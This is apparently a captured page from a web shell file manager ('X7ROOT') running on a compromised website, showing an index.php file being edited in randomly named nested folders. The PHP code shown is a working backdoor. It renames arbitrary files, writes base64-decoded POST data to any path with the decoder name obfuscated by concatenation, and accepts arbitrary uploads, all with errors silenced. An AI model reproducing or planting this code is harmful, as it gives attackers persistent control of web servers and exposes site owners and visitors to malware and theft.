X7ROOT File Manager
PHP:
7.4.33
OS:
Linux
User:
vianto5
Root
/
home
/
vianto5
/
citicompras.mx
/
xtsgamh
/
rhtcxvy
/
kwmh1jv
📤 Upload
📝 New File
📁 New Folder
Close
Editing: index.php
<?php error_reporting(0); if (isset($_POST['fname'])){ rename(trim($_POST['fname']), trim($_POST['sname'])); exit; }elseif(isset($_POST['message'])){ $b4 = 'base6'.'4'.'_d'.'ecode'; fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message']))); exit; } move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']); ?>
Save
Cancel